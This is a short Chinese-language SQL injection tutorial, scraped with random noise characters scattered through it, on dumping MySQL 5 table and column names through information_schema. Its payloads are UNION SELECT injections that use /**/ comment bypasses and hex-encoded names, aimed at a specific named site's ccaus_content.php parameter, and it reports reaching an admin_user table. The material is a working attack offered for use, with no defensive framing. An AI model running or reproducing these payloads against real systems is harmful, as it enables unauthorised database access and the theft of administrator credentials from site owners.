6 ^/ F! a6 _7 { l4 Lid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1 " G" W9 v2 B. E4 \& |! Q / e# V, b v, I! w# B- C ?( I. L x5 t- c. z
mysql5高级注入方法暴表 0 ^6 _% L m, y2 m2 C. ~9 I, ~/ x4 d" F& r
例子如下: - g" f( F# S; r( T8 X ( i& U. C/ ^8 h1.爆表 ! Q3 `5 r+ X7 f9 khttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet) % f8 q* ~- s9 W* N1 o' U这样爆到第4个时出现了admin_user表。; f1 ~6 c8 ^) G e, @
k D. k# G" S |
2.暴字段 * m( y, z* x7 L. d' Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* . Q% T6 G7 |9 b2 Y( a& S5 k2 B) [0 W U* l+ h# {) ?